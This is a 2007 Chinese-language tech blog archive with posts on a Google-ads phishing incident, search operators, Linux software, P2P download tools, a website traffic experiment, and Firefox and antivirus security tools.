Friday, April 27, 2007
黑客利用Google廣告設陷阱盜資料
著名搜尋網站Google與商業公司合作,在網上刊登收費廣告,成為Google的主要收入來源,但這項服務卻被不法之徒利用。當網民利用Google搜尋資料時,可能會被引誘點擊有問題的廣告,黑客便趁機盜取這些用戶的個人資料,例如銀行戶口號碼和密碼。至今未知道有多少人受到影響,而Google已採取措施堵塞這個漏洞。
Google是於本周接獲通知後,才知道出現問題。電腦保安專家表示,相信這些是個別事件,未有擴散的跡象。黑客主要攻擊的對象,是那些沒有定期更新軟件的「視窗XP」用戶。
一家互聯網保安公司的專家艾尼利說:「這是一宗嚴重事故,會影響客戶和網民的信心。不單只Google受到影響,連整個行業都會受到打擊。」
網民現時利用Google網站搜尋資料時,除了見到自己想要的資料外,還可能見到相關的廣告。
而一些廣告連結可能是黑客佈下的陷阱,網民一不留神點擊入內瀏覽,便會「中招」,進入另一個假網站,這時網民可能會被黑客盜取資料。Google表示,該公司已經移除懷疑有問題的廣告,並且關閉了問題廣告商的帳戶。
Labels: Google
Tuesday, April 24, 2007
你真的会用Google搜索引擎吗
短语搜索
Google 默认的设置是在页面上任何位置搜索到用户定义的关键词,无论这些关键词是连在一起的,还是彼此分散的。如果希望搜索的结果中包含按照输入顺序出现的关键词,那应该在关键词加上引号,告诉搜索引擎用户需要的是什么样的匹配方式。在Google中,这就叫做短语搜索(phase search)。
如果以“娱乐资讯信息”关键词进行搜索,Google搜索出来的结果是那些在页面上任何位置包含这些关键词的关键字的页面,不一定按照输入的关键词的顺序显示。
如果以“"娱乐资讯信息"”关键词进行搜索,Google搜索出来的结果就包含这个关键词的页面,并且按照输入顺序显示。
布尔逻辑
对于一个搜索引擎的算法,搜索的页面是匹配所有的关键词,还是仅包含关键词的任意次就可以,称之为搜索引擎的布尔逻辑默认值。搜索引擎可以使用布尔逻辑与: AND(搜索到所有关键词),或者使用布尔逻辑或:OR(搜索到任意一个关键字即可)。就是搜索引擎默认布尔逻辑也不是说只能用这种逻辑,可以通过一些特殊的命令来执行其他的逻辑。Google搜索引擎默认是AND逻辑。
如果以“娱乐 资讯 信息”关键词进行搜索,Google会自动搜索所要包含关键词的网页。
如果希望的是匹配其中的任意个关键词,应该在每个词的中间加上“OR” ,如:“娱乐 OR 资讯 OR 信息”。(注:逻辑或要用大写“OR”,或者“|”)。
也可以将关键词用括号将其分组,搜索某个关键词加上一个或者几个其他的关键词。具体形式如下:“娱乐 (资讯 OR 信息)”,搜索的结果会是“资讯”或“信息”包含“娱乐”的网页。
否定
如果要求的查询结果里不包含有个词,可以使用符号“-”(一个减号),如:“娱乐 咨询 –信息”,就会搜索到包含“娱乐”和“咨询”两个关键词,而不包含“信息”的网页。(注:减号与关键词之间不能有空格)。
同义词
有时候搜索的结果中会丢失一些重要的网页,因为选择的关键词不是唯一的表达这个信息方式,还有其他的表达方式。如果不跟关键词匹配,那就不会出现在搜索结果中。
Google允许查询同义词,在关键词的前面插入“~”符号,就可以进行同义词的查询了。这个功能好像对中文不怎么支持,输入“~汽车”,查询的网页都是有关“汽车”的页面没有发现同义词。用英文测试一下,输入“~car”查询,就会发现了同义词“BMW”和“Racing”等。
数字范围
在网络搜索时,有时候会遇到查询连个数字区间的问题,比如日期、货币、尺寸、重量、高度或其他的计量系统数字区间问题。数字范围运算符“..”(两个点)表示查询某个特定的数字范围内的结果。比如查询数码相机,价格在2000元-3000元之间的网页,如“数码相机 2000..3000元 ”。
也可以进行最大值和最小值的搜索,比如,如果查找在蒙大拿州内不少于500英亩的土地,可以这样搜索,“acres Montana land 500..”;如果你想购买一件价值在30$以下的宠物雨衣,可以这样搜索“raincoat dog ..$30”。但是最大值和最小值对中文不支持的不好。最小值搜索,比如搜索关键词“济南 商品房 面积 90..”,就不会有任何搜索结果;最大值搜索,如果用关键词“济南 商品房 面积 ..120”,只是搜索到有包含任何关键词的网页,最大值没有体现出来。
Linux操作系统桌面应用软件使用推荐
现在把我的linux系统下使用的软件与在windows下的软件环境给出一个对比结果。
一、办公软件
永中office2007 PK Microsoft Office2003
办公软件是我们最常用的软件,可以采用“永中office2007”,有的朋友可能使用的是open office。不过经过我的使用比较,发现永中office比open office要快的很多,还有对于中文支持,及使用习惯上都更适合中国用户。
永中office2007能够双向精确兼容微软Office文档,包括加密的微软文件,也支持存取网页HTML和XML等文件,还可以输出为PDF文件。永中集成Office2007还添加了在中国的公文中经常使用的竖排、横排等格式的组合,或中国特有的拼图等MS产品所没有的功能。这套软件中包括文字处理(对应MS的 word)、电子表格(对应MS的Excel)和简报制作(对应MS的PowerPoint)三大应用。
二、文本编辑器
gedit PK 记事本
在windows下,我们常常用记事本或是editplus等软件编辑文本文件,在linux可以选用gedit软件。
三、图像处理
Gimp PK Photoshop
如果喜欢用Micromedia产品,现在可以找到在linux下的版本了,与在windows一样。
Micromedia Flash 、Macromedia Fireworks都有在linux下的版本。
四、输入法
XSIM,SCIM都很不错,里面有五笔、拼音等多种输入法。
五、聊天软件
可以用 Gaim,在Gaim下可以使用MSN、QQ、ICQ,gtalk、YAHOO等。
经常用skype的也不用担心,现在skype也有linux下的版本,经使用语音效果很不错,不比windows下差。
QQ如果不采用Gaim的形式,可以单独安装LumaQQ,这个软件有windows下QQ的大部分功能。
六、网页浏览器
Firefox PK IE
相信很多人都使用过Firefox,在linux下,与在windows下一样的出色。同时还可供选择的浏览器有Opera ,我的机器上这两种浏览器都安装了。另外对于Firefox浏览器可以选择性的安装一些扩展,这样你会发现你的Firefox越来越好用,也更漂亮。
http://addons.mozine.org/firefox/
http://www.firefox.hk/
这两个站都不错的,去看一看吧,一定有很多收获,windows的用户也可以看看,一样适用。
七、下载工具
电骡下载: aMule与windows下的基本一样,感觉比windows下的更快一些。
BT下载: BitTorrent软件
多线程下载:MultiGet 类似于FlashGet下载软件。还可以采用Wget软件。
也可以通过扩展 Firefox插件提供多线程下载,我安装的是DownThemAll插件。
八、FTP工具
可以使用KFTPGrabber软件来取代windows下的相关ftp软件。当然可供选择的还有很多。如:proftpd、CrossFTP等。
九、电子邮件客户端软件
Thunderbird PK FoxMail
Mozilla Thunderbird 是一个强大的开源邮件和新闻组客户端。与firefox同出一家,完全可以取代foxmail。当然使用outlook的用户可以选用Evolution软件来取代。个人推荐使用Thunderbird软件。
十、网页编辑软件
本人机器里安装的是Micromedia Dreamweaver MX,因为在windows下使用Dreamweaver习惯了,所以其它的用户起总觉得不方便,还好在网上找到了这个软件的linux 版本。不错与在windows一样的使用。
十一、英汉字典
星际译王 pk 金山词霸
星际译王这个软件虽然比金山词霸差些,但是足够满足我们的日常使用。在网上也发现了有金山词霸的linux版本,不过没有试过。
十二、视频软件
MPlayer(可以放 VCD, DVD, divx, wma, wmv等)、RealPlayer。
p2p电视软件: 可以安装gsopcast,虽然比不上windows下的,总算在linux下有的可用。
十三、音频软件
可以用xmms(支持多种格式)取代千千静音之类的音频播放软件,效果也不错的。
十四、打包压缩与解压缩软件
在linux下可以用gzip , tar 等。
十五、开发工具
Eclipse, GCC, make, Perl, Python, Tcl/Tk各种语言都有。我的机器里安装了 Eclipse3.2 及 GCC 等。
在linux下的java开发一点问题都没有。tomcat、myeclipse、svn等一系例软件都有linux版本,很是方便。
十六、UML设计工具
Dia PK Visio
Dia能制做 UML 图,流程图,电路图等,并能转换成多种外部格式(dxf,cgm,wpg,fig etc)。在ubuntu下可以直接通过新立得软件管理器安装。具有visio大部分功能,最少需要画uml及流程图等有工具可用,并且还算不错的工具。
十七、项目计划工具
Planner PK MS Project
Planner可以用于计划,调整和跟踪项目。与MS Project很像,不过功能上有差一些,但是足可以替代,不足的是不能与MS的数据互相沟通,这样很影响其它不用比工具的人无法互通计划文件。
当然linux下还有很多好用与实用的软件用来取代我们在windows下的常用软件。做为技术人员,专业人员为了工作或爱好完全采用linux是可行的。但是我还是建议在系统中保留一份windows系统,因为娱乐方面,玩游戏方面还是windows下支持的更好,这个是linux现在没有办法超过的。不要与我说在linux下可以用wine之类的软件。这类软件的性能如何,用过的人我想都知道。只能说能用,不代表好用。我现在的linux系统里就安装了 IE浏览器,要比linux下的其它浏览器慢得多,更比不上在windows系统下的效果。linux不可能完全取代windows系统,不过,我觉得有一天它可能会与windows平分天下,拥有各自相当数量的群体,就像现在开发语言中.net开发人员与java开发人员一样,各有所偏爱,各有所专功而以。
不管怎么说,看到linux系统发展到现在这个样子,应该是一件很值得高兴的事情,因为我们除了windows系统可以有更多的其它的选择。
Monday, April 23, 2007
一个人运作网站第1月访问人数突破1万人的试验
2个多月前我有一天突发奇想,想锻炼自己对互联网的洞悉程度、网民心态的把握,决定在没有任何技术支持、不做任何推广、几乎不花费自己工作时间、没有任何原创内容的条件下,看自己用很少的时间、一个人做一个网站第一个月可以将流量做到多少。
一、 网站定位策划:
我 对网站运营的认识:我觉得“确解用户之意,切返用户之需”是最重要的,一个网站的重要性一般依次为:市场需求及目标用户理解、产品(服务)开发、技术、市 场推广。网站要专注用户体验,永远不能夸大市场推广的炒作作用,网站的核心在于用户体验与产品(服务价值)。市场推广是输血,一个网站不能永远靠输血,主 要还是要靠网站的价值与产品发展。(尽管我现在职业定位是网站推广,但我不能夸大市场推广的对网站的作用)。以上认识是和许多资深互联网交换过,一般真正 懂互联网、有网站运营经验的人都有这样的常识认识。如果你的网站不做任何推广靠网民口碑能够做到每天1万人访问,你这个网站才有商业价值。
所 以我的全新的个人网站的规划首先应该从网民的需求的开始,一定是大众需求、而且是普通需求的。但大众最主要需求:吃喝玩乐、衣食住行的网站多如牛毛;黄、 赌、毒也是网民最主要的需求,但前者中国特色的网站都有这方面的内容了,后二者是法律不容许的。我要做一个没有人做过的网站,最后我想到专门负面信息垂直 聚合网站应该能满足网民还不能完全满足的需求。―――分析出市场需求:负面消息网站。而且不能是大路货的负面信息,即一定是BBS及Blog上的信息,因 为主流网站与新闻媒体的信息基本都是垃圾信息,即公关软文为主。
我这样定位我的网站:
恶评网(www.buhao123.com)定位:
1、全球第一个专门搜索垂直聚合负面评价信息的网站
2、100%的负面评价信息:明星、名人、名企、名品、名书、名电影、名网站之恶评。没有一条正面评价信息。
3、90%的坏信息可能是网民不知的,不出现在正规媒体上,只出现在BBS及BLOG上。
二、 网站域名策划
定 位想好了,接着策划域名,这个也很重要,域名与网名策划的真谛就是过目不忘,即你向一个人介绍这个网民域名,别人第一次就能记住,其他都不重要。特别对于 一个个人网站,没有任何推广,独特与过目不忘是最重要的,最好是借势,不要创造一个新的。特别有意思的是负面关键字的网站域名特别好注册,因为没有人去注 册 “坏”、“不好”、“负面”、“否定”去做以后自己网站的域名,所以想得到的“坏方面”的域名很多都可注册,一个朋友还准备提供自己的域名“坏消息”网给 我,但我觉得借势很重要,即借势网民已经知道的知名域名,最后我决定用buhao123.cn(不好123),中文名叫“恶评网”,应该令人过目不忘吧。
我不想在建设网站技术方面花费我1分钟时间,决定借用和讯网站Blog系统来建网站(有现成的RSS及网摘“坏消息”功能),网站技术就解决了,并将自己注册的域名buhao123.cn跳转到这个Blog系统即可。
三、 网站内容策划
网站最主要的是内容,我可没有时间去写任何内容,决定采用搜索引擎全部通过搜索转载,如用元搜索网站索天下www.suotianxia.com,可以同时搜索google/baidu/等,可以将多个重复搜索结果归类,可以节约用多个搜索引擎的时间。
好 在我平时最喜欢看报,以前我每天看好几份报纸(《21世纪经济报道》成功的实质就是挖掘企业的负面信息报道人们都爱看),我对负面消息都还有印象,开始凭 记忆收集一些名人的不为人所知的负面评论信息,如李嘉诚被认为是神,但他与周凯旋之事、其夫人之死、房地产开发的负面新闻等等是较少人知道的,这篇转载文 章的点击率就达到了16000:
http://buhao123.blog.hexun.com/6271261_d.html
还有刘长乐、马明哲及陈丽华的发家内幕传闻等等,这些我以前都知道,于是每天用半小时用“索天下”用关键词搜索10条左右负面信息,就组成了网站内容。(我对用关键字找到有用的信息恰好经验丰富。
四、 产品开发
周 末有空还为我的恶评网做“互联网产品开发”,所谓产品开发就是什么是“热新闻”,我就相应搜索收集“恶旧闻”,如胡润富豪排行榜出来后,人们只羡慕他们有 钱,而不知道他们恶性累累:恶评网的宗旨是搜索聚合负面消息,还人或事一个真相。只聚合负面信息,看看bbs及blog老百姓到底是如何评价这些富豪的。 这次广州有4个房地产富豪上榜前10名,而我在广州时早就听老百姓说这几家房地产公司及老板口碑极为不好,基本就是黑社会及官商勾结及媒体勾结的产物。如 合生创展及恒大基本是血案累累的房地产开发商:
http://buhao123.blog.hexun.com/6036971_d.html
如霍英东逝世,但一般知道他捐款,但很少人知道他是香港最大的走私商之一。我做了关于他及子女的负面消息主题。如“赌王霍英东”一则消息有6000多的点击:
http://buhao123.blog.hexun.com/6271261_d.html
可以说以后要看一个名人、一家名公司等的全部负面消息,除了搜索引擎,全中国只有一个网站可以看就是恶评网。
其实我还有很多网站产品开发的想法,也很容易做到,可惜我没有时间去做:
如:
发动网友每天将自己城市报纸上的负面消息报道扫描上传。这样全国负面消息每天更新、而且全国都知道分享。
将火车站车站那些地下杂志的负面信息打字上传(那里八卦内容负面很多呀),很多都非常有价值(如果你对中国有深刻认识,你就中国发行量最大报刊杂志就是这些杂志,你也知道恶评网的前景价值有多大)。
将世界500强企业、驰名商标等按照一个一个企业等将互联网上所能够出现负面信息全部分类聚合,会很有价值(用“企业名称”+“负面”或“官司”或“投诉”或“传闻”或“偷税”或“经营不善”或“倒闭“或“虚假”或“黑暗”或“虚伪”等等)
五、 恶评网的试验成果
我化了1个月,搜索张贴了100多篇文章,新网站推出一个月的访问量就超过10万人,即每天访问超过3000人。可惜我上一个月没有时间更新,现在的推出2个多月访问量也超过13万。
见最新访问量数据:
http://buhao123.blog.hexun.com/
文章总数:311
评论总数:244
总访问量:132579
“恶评网”的baidu搜索结果为1650:
http://www.baidu.com/s?ie=gb2312&bs=%B6%F1%C6%C0%CD%F8&sr=&z=&cl=3&f=8&wd=%A1%B0%B6%F1%C6%C0%CD%F8%A1%B1&ct=0
所以有时间与精力,一些产品开发能实现、做到每天更新,1年后应该这个网站可以轻而易举的做到每天访问量超过1万,即一年有超过300万人流量,应可以超过很多有几十人运营的商业网站。
总结:
这 个恶评网更让我了解网民的口味,我一直关注每一篇文章转贴出来后的点击率,因为没有推广,就能真实反映。有些文章我不看好,却点击率很高。有些我很看好, 但点击率很低。但总体来说还是不错的,而且这个网站的pv(即浏览页面很高),一般为10,即一般人来这个网站会看10篇文章,。即一个网站,网站内容及 价值是最重要的。
对艾瑞《网上旅行预订研究报告》的解读
前几天拿到了艾瑞对2006年旅游市场的研究报告,报告全称叫《iResearch-2006年中国网上旅行预订研究报告》。很仔细的拜读了几遍,其间由于参加艾瑞的新经济年会晚宴,又跟艾瑞的研究副总监侯涛做了深入的沟通。
因此,对今年的报告有几点个人见解,希望能对艾瑞明年的报告,起到一些建议作用。
一、未来线上企业的业务类型将相互交叉
1、 传统航空公司的自营,必然因为其规模化效益及优先扩展能力,从而进军酒店预定领域。象春秋航空、南航都直接推出了酒店预定。最关键的是,其所推荐的酒店,恰恰是携程因为赚取佣金不足的原因而无法覆盖的。比如:南航推荐的北京安定门宾馆、春秋航空推荐的安吉丽景度假酒店,在携程上是根本查询不出来的;
2、 报告中提到的“快乐e行”,基本将“传统旅游服务商线上分支”演绛成了新的版本:从无线预订、无线选座开始了电子客票新的销售衍生。虽然建立无线服务平台的市场竞争度不高,但毕竟已经有了新模式的开始;
二、在线旅店预订服务商的机会
1、 图释很好的说明:携程这样的旅行预订网站在这里完全成了酒店的代理,同时也成为衔接用户和酒店的中介。旅行预订网站通过酒店的佣金从而获得收入;
2、 类似于雅高酒店集团这样的国际连锁酒店品牌不断加强在中国地区的销售攻势,尤其是他们在高端商务市场具有更强大的冲击力,严重分散了携程的客源;近年来蓬勃发展的经济型酒店也非常重视针对终端市场的销售和服务,例如锦江之星推行的会员卡和网上预订特价吸引了众多客人直接进行预订;
3、 酒店业大致可分为六类,分别是豪华酒店、高档酒店、中档酒店(包含有餐饮宴会和无餐饮宴会两种)、经济型酒店和廉价酒店。旅游搜索引擎将向用户提供包括价格比较、服务选择、特价促销在内的实时信息,这是携程等旅行服务商所无法提供的;
三、未来报告中,线上与线下业务的拆分
2006年携程全年收入为8.34亿元,e龙全年收入为2.645亿元。按照携程、e龙公开的数据标准,其线上线下业务比例为2:8来计算的话,携程线上部分2006年收入应为1.668亿,e龙线上部分收入应为0.529亿。
我向侯涛提了建议:中国网上旅行预订研究报告,不光要像现在这样,做好旅行预订的研究,更要将线上、线下拆分,做好纯网上预订的研究。
Sunday, April 22, 2007
电驴和bt
http://blog.verycd.com/ninspector/cmd=showentry&eid=11648
今天去下载金山词霸,发现VeryCD上没有完全版,于是打开了久违的btchina,和5qzone,找到了两个有种子,down了下来。
自从发现了电驴的好处之后,已经好久没有用过bt这种下载工具了(好久是多久?大概我重装两次系统那么久,也就两个月吧),在这期间,重装系统只是出于惯性而装上bitcomet,但是到下次重装,一次都没有用过。
想当年刚刚发现bt的时候,还在痛苦的和ftp网站作斗争,想着哪里能发现个密码,用户名,登陆,下载。bt的出现好像是黑夜里的一道闪光,从此以后,flashfxp就被打入冷宫,永不录用。
后来,随着本人看电影速度的加快,和收集电影嗜好的见长,渐渐的对bt产生的不满,为什么1天才更新3-4个电影,还未必是新的,未必是我们想看的,想看的还没有种子……那个时候也已经知道了电驴,知道有个网站叫做VeryCD,但是觉得bt有很多网站,VeryCD只有一个,当时对highID和 lowID也没有什么概念,防火墙不打开,结果永远是蒙着眼睛的小骡子,下载东西超级无敌的慢,大概3-4k,一天下来一个电影还未必能下载完,总之是很郁闷,于是就弃置不用,继续和bt亲密无间。
直到有天,我在找一个很古老的电影,在google上搜索,发现只有VeryCD上有。于是无奈开始下载电骡子,痛苦的看了长达数页的软件说明,总算fight a way,搞定了一个high ID,速度果然立杆见影的长到100-200K,到此为止,只是开始接受了电骡子,但是还谈不上喜欢,主要还是用bt。
再后来,当我查看别人的共享的时候,突然发现,很多人共享的文件名,和我下载的文件名是完全不一样的,但是电驴照样从那里下载。经过研究,发现是hash码相同的文件,电驴都可以用作源。这个发现彻底的改变了我心目中bt和emule的重要性对比。bt的局限性在于,哪怕是两个完完全全相同的文件,如果两个不同的发布者发布了,那么他们各自隶属于不同的种子,并不能互通有无。比如《神奇四侠》,在bt上经常出现这样的情况:神奇四侠DVDrip版 1个种子,20个正在下载。 神奇四侠超清晰版 2个种子,14个在下载…………这样弄得大家都很不自在,下载都很慢。如果是电驴,只要你点开了其中任何和一个ed2k的链接,会有3个源,34个人在下载,这样显然保证了有源性和速度。
技术上讲,bt是远远不如emule来的有效率,至少是在可下载性这个角度上来说。emule不如 bt流行,一个是宣传上的原因,一个是复杂性。bt上手很简单,只要是不是很笨或者很不耐烦,从知道bt这件东西到学会下载,大概一分钟足以,设置界面也很简单,从内容到形式一目了然。电驴则不然,开机画面的那一大堆服务器列表就很让人发怵,然后还要学会如何设置来优化,如果得到HighID(这问题bt 也存在,但是bt从来不把这个问题提出来,你下载的慢,活该啊,谁让你是内网的?电驴提出来了,结果导致很多抱怨,现在知道稳定压倒一切的重要性了吧?嘿嘿)还有很复杂的记分规则,很多人可能不理解为什么我明明连上了别人的种子,还要等待,就是不让我下等等……这些都妨碍了电驴的推广。
bt是一台傻瓜照相机,方便,快捷,emule是一台单反数码,强大,复杂。
电驴,BT,迅雷以及其他
http://www.leiz.name/post/2006090201.html
最近开电驴的时候,总是会有这样的提示出现:
Note to chinese users of this server.It seems most chinese people use a modified eMule that abuse servers.(This *buggy* version sends automatic searches, over and over and servers suffer)Please use standard emule program 0.47a, or we will be forced to deny accessto this server for *all* chinese people. That would be bad :(
查一下才知道,原来有个叫Vagaa的eMule客户端为获取较高的下行速度,疯狂抢占DonkeyServer链接,DS支撑不住了.厄,我倒,怎么最近总是有狗屎事出现.比如被ICP深恶痛绝的BT扬言要封杀,比如一个叫迅雷的小偷软件.
解释一下这些软件的区别,顺便扫盲.
BT: BitTorrent,一种p2p下载,所谓p2p就是点对点下载,当你在下载资源的时候,同时提供自己的资源给别人下载.BT服务器负责维护一个列表, 包括:资源信息,种子ip,链接ip等.但是服务器不负责保存资源文件本身.BT的特点就是下载的人越多,速度就越快.适合于新软件的发布,或者频繁更新的资源,以及影音资料的发布等.是个开源的软件,客户端包括BitComet,比特精灵等.
eMule:一种p2p的下载软件,同样,服务器上不提供任何资源,但是保存资源每个客户端所拥有的资源信息,比如文件的Hash等.当客户端向服务器发出查询请求时,服务器返回客户端需要的资源保存在那些其他的客户端上面,下载的事情,由客户端对客户端完成.当一个资源copy到另外一个客户端,这个资源就多了一个副本,并被记录在服务器上.由于这样的特性,在eMule上,只要能够找到的资源,就一定能够下载下来,只是时间的早晚问题而已.适合于一些比较稀缺的资源的下载.比起BT,速度不是很快.但是稳定.也是个开源的软件,客户端包括VeryCD,Vagaa等,统称电驴.
迅雷:一个p2s的下载软件,同时提供p2p下载方式.该软件的特点是,在服务器上维护一个庞大的列表,保存了互联网上资源的信息,当客户端点击对应的资源试图下载时,在下载客户端指定的资源的同时,服务器查询自己的数据库中该资源的副本信息,并从结果集中发出下载请求,即:客户端的请求资源,并不一定完全是自己请求的那个资源的副本,而是很多地方的副本片段合并而成.并且,一旦客户端下载完成,该资源就成为下次其他客户端下载时的副本,并共享出去.这个过程,对于客户端来说,是透明的,并不会获取到通知.并且,对于其他互联网上有该资源副本的服务器,迅雷的客户端的下载是非正常的.这个软件的特点是迅速,比起普通的下载软件如FlashGet等.
FlashGet:老牌的p2s下载软件,工作原理是通过http协议或者ftp协议向资源服务器发出下载请求,并获取下载资源,组织并保存资源信息.可以实现多线程并发下载.特点是稳定,管理方便.
GuteFtp:老牌的FTP管理软件.不多说,用的人几乎都是知道的.
扫盲结束,接着说正题.
对于eMule来说,优势不是下载速度,而是稳定,并且可以下载到几乎所有你想要下载的资源,无论该资源有多么冷僻.但是,Vagaa这个客户端,却修改了 eMule 4.71b的核心,为了获取最大的下行速度,给服务器巨大的压力.阻碍了其他客户端的使用.厄,真的恶心死了.不明白为什么那么多那么好的东西怎么一到了中国就变了味道.你看看人家老外急得,要封杀了整个中国的电驴客户端了,到时候大家都没得玩了.你就满意了吧.
想起上半年闹了一段时间的天空华军封杀迅雷事件,虽然有人说是迅雷和华军以及天空的联合炒作,不过不管怎么说,引出了一个问题:迅雷在下载的时候,没有获取资源服务器允许就伪造凭据去下载资源服务器上的资源给并不是该服务器的客户端,这样的做法是否合法.还有一个就是,客户端在保存了该资源副本以后,就默认为共享给互联网上的所有迅雷用户,这样的做法是否属于侵犯用户隐私.等等.甚至,这样的演绎结果就是:互联网上愿意做资源服务器的越来越少,因为根本就带不来流量,还会被盗去大量的带宽.迅雷就想下就没得下了.一个怪现象是:当你解释了迅雷的小偷行为和危害以后,很大一部分人还是坚持使用这种东西,理由很简单:它是最快的,我才不要管它是不是合法.更不要去管这样的行为给别人带来什么情况.我已经不想讨论这个问题,是因为起码我已经知道,大部分使用互联网的人,也就那么回事.
还有一个是BT,说这个是因为国内网络运营商的口径:曰BT占用了大量的网络带宽.要封杀.我就一直纳闷的是:我明明买的是512K的带宽,我BT上载下行速率加起来也超不过我自己买的这个速度,怎么就占用了大量的网络带宽了?难道是你运营商根本就不打算提供给我这个速度?有一个比喻很精彩:如同我去电影院看电影,本来电影院只能容纳500人,你偏偏卖1000张票,而且你试图让另外500个买票的人不要来看电影.你Y就知道你的资源综合利用了.我靠.这逻辑,太TMD强盗了.
然后提一下GuteFtp和FlashGet,真的是不错的软件,我喜欢,推荐一下.Do Not Be Evil.
驴子和BT的区别
http://board.verycd.com/t279710.html
驴子是用来给你养的 ;
B.T是用来给你抢的 。
养驴不用担心它会跑,因为它会等你 ;
抢B.T可要手快,因为它过期不候 :angry 。
驴子在等你时,通常不叫 ;
而你在等B.T时,通常是哭喊着“那位大哥补种啊”。
驴子,总是让你有颗平常心,要你学会忍耐,最后知道平淡才是真;
B.T,总是让你充满激情,要你精神高度集中,最后知道激情只能是在一瞬间。
在寻找沙漠中的绿洲时,
驴子虽然速度慢,但平淡的时候让它有充沛的体力,通常能默默的完成任务,带你到达目的地;
B.T,虽然速度快,可是平常过度挥霍激情,已经让它没有了耐心,通常在倒下前哭喊那么几声,之后……。
驴子,培养你的毅力同时,让你感悟出“我为人人”;
B.T,挥霍完你的激情后,让你坚定了“人人为我”。
Saturday, April 21, 2007
五个让Firefox更安全的工具
流 氓软件、病毒、钓鱼、木马让上网浏览变得危机四伏,浏览器成为最容易被攻破的薄弱环节。使用Firefox可以帮助你避免网上众多只针对IE的恶意攻击, 获得一定的安全保障。InformationWeek更介绍了Firefox的五个安全工具,其中包括四个扩展和一个内置工具,可以让你在使用 Firefox浏览时更加安全。
-
NoScript-防止运行恶意脚本
Firefox不支持ActiveX,从而杜绝了很多针对ActiveX的攻击,但仍然会运行Javascript和Java等动态内容。尽管你可以使用“禁止脚本运行”的功能,但这样做并不方便。使用Noscript扩展,你可以指定只运行来自信任网站的脚本。
-
SiteAdvisor-帮你发现恶意网站
由McAfee提供的SiteAdvicor扩展,可以对你的搜索结果、正在浏览的网页以及某个链接给出危险程度的评估。其评估基于该网站使用弹出窗口的频率、散发垃圾邮件的可能性以及是否存在流氓软件下载,警告你远离不安全因素。
-
反钓鱼工具
Firefox 2.0 Beta1已经集成了一些反钓鱼工具。除此之外,你还可以使用Netcraft提供的反钓鱼工具条或者Google提供的安全浏览扩展。
-
保护个人数据
在菜单中选择 Tools|Clear Private Data ,然后在对话框中选择你要清除的个人数据,保证你的隐私不被泄漏。这点在公共场合的计算机上网时尤其有用。
-
密码生成器
对于不同的服务或者应用使用一个或者少数几个密码是非常不安全的,但我们又很难一下记住那么多密码。使用密码生成器扩展可以让我们通过一个主密码就能够在不同的地方使用一个自动生成的强密码,保证密码的安全性。
有了这五个工具,让你本来安全系数就很高的Firefox更增加了一副铠甲,让你的网上冲浪更安全更自在。
五个保护Firefox的工具–来自InformationWeek
Sunday, April 15, 2007
Cyberhawk 行为分析/主动防御 (免费)
Cyberhawk 是一款来自美国的行为分析/主动防御软件
有人把它称为外国的微点, 虽然不是很恰当, 也可以反映它对未知病毒拦截的效果不错!
它有免费版本, 不过和Pro版在一起, 安装后能够试用Pro版所有功能15天, 15天以后就自动转为免费版本.
免费版本用于拦截未知病毒完全没有问题, 只是比Pro少了Rootkit扫描, 病毒隔离和自定义规则这三个功能.
http://www.novatix.com/
官方网站, 软件都是英文的, 好在使用非常方便, 不需要进行设置就能保护系统, 所以对大家来说应该不成问题.
以下试用, 均为15天Pro试用过期后进行, 以真实反映免费版本的性能!
2个进程, 占用内存不大, 不能通过任务管理器结束, 它的服务也不能停止, 保证不被恶意程序轻松关闭
发现可疑活动, 并不意味着这个程序是病毒, 只是他的行为具有一定的恶意特征, 自己判断是否需要拦截. 一些正常的程序同样可能被它拦截到可以活动, 比如 avast!
Cyberhawk 不能替代杀毒软件, 但绝对配合杀毒软件提供更强的保护, 尤其是发现0-day病毒.
它没有病毒库, 对系统速度影响非常小, 误报也非常少, 基本感觉不到它的存在
(与微点不同, Cyberhawk在没有病毒库的情况下能够阻止大部分恶意程序, 我觉得已经做得非常优秀了)
现在我用 avast! + Cyberhawk 扫描已知病毒, 同时也拦截未知病毒!
关于Cyberhawk我想补充一下:看了很多朋友的回复,都在拿微点和 Cyberhawk做比较,我在这里想说明的是首先微点和Cyberhawk的定位不同,微点定是在新一代的主动防御杀毒软件,大家看微点的架构就知道除 了杀毒功能,微点还整合了防火墙以及其他的特色功能,已经具备了相对成熟的安全防护系统框架,也就是说基本在个人计算机上可以独立承担安全防护功能;而 Cyberhawk的定位是新一代的主动防御辅助防护软件,包括开发者都宣称是“complement补充”而不是“replacement替代”,个人 户觉的Cyberhawk的防御功能相对微点更为纯粹和精悍,尤其是资源占用几乎感觉不到它的存在(很多朋友说资源占用高,我想可能和某些杀软存在冲突, 或者系统端有问题,个人使用情况是:内存实际占用2.5M,含虚拟内存15M左右,这个水平比较稳定),所以拿小而精Cyberhawk和大而全(当然也 比较精悍)的微点硬性比较并不合适。
微点这东西,有个地方不好,让人不爽。
微点为了反盗版,使用了一个很极端的做法
它把你的注册信息,注册时间写入了硬盘的隐藏分区,即使你格式化硬盘,GHOST,重做系统后。微点依然能记住你的序列号和剩余时间
设想一下,你以后不用微点了,无论你重装多少次系统这个信息也无法消去。你加入把硬盘卖了,这个信息也可能暴露
3721再流氓,再难删,重装了系统也能删掉,而这个信息用常规方法无法删掉。如果以后所有软件都写隐藏分区,你硬盘抗的住吗?
绅博论坛有人提出这个问题后,微点专区的版主亲口承认微点格式化了一个隐藏扇区
--
xuqs:
Cyberhawk没用过,但微点说实话不是完全的主动防御,感觉他还是有病毒码技术成分。总之主动防御技术我个人并不看好,启发式技术与虚拟技术结合好,用在防御体系中,更实在一些
--
sunsun:
Cyberhawk目前用起来感觉还是有一些问题的,比如说admuncher这个软件,cyberhawk它有的时候说它是危险软件,拦截,有的时候却放过,即使你把定义为可信任,也不行,还有自己定义的规则似乎不行。
我用的是坤博的汉化破解版。
微点,俺的早过期了,如果您水平菜,还是用微点好一点
--
cuilu: 我是比较看好主动防御的,它减少了繁琐的病毒库更新,美国的主动防御软件Cyberhawk Pro2.0.1.2版与中国的微点主动防御比较起来还是中国的好用些,最起码不用破解就能看懂,但不知道哪个最先推出的,刘旭什么时候能像 Cyberhawk 这样不对家庭用户收费,什么时候才能推出正式版本?既然在>>深度>>提到主动防御,我想请大家密切关注它.
Labels: antivirus
McAfee的HIPS未来终端安全新趋势
写在前面的话
1.McAfee Host Intrusion Prevention的前身是McAfee Entercept,它的最新版本集成了McAfee Desktop Firewall
2.官方已经停止了对Desktop Firewall的主程序更新
3.使用Host Intrusion Prevention已是大势所趋^_^
